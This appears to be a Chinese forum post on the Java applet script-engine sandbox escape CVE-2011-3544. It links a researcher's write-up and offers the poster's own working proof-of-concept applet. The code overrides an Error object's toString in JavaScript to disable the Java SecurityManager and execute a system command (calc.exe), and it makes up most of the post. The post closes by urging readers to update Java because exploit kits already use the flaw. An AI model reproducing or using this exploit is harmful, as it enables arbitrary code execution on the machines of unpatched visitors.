老外发现的,详细描述看他的blog:http://schierlm.users.sourceforge.ne...2011-3544.html
这个老外很有趣,把细节讲的这么详细了,却不肯给出POC,说怕被坏人利用 ~~~
大哥,真怕被坏人利用乃就不要讲的这么详细好不好啊~
自己构造了个POC,要的拿去玩,反正迟早要进metaspolit
代码:
import java.applet.Applet; import javax.script.*; import javax.swing.JList; public class ScriptEngineExp extends Applet { private JList list; public void init() { try { ScriptEngine se = new ScriptEngineManager().getEngineByName("js"); se.eval("var error = new Error(\"My error\");" + "this.toString = function(){ " + "java.lang.System.setSecurityManager(null);" + "java.lang.Runtime.getRuntime().exec(\"calc.exe\");" + "return \"exploit!\";};" + "error.message = this;"); list = new JList(new Object[]{se.get("error")}); this.add(list); } catch (ScriptException ex) { ex.printStackTrace(); } } }
大家机子上有Java的,最好升级到最新版本,已经有exploit kit在用这个漏洞了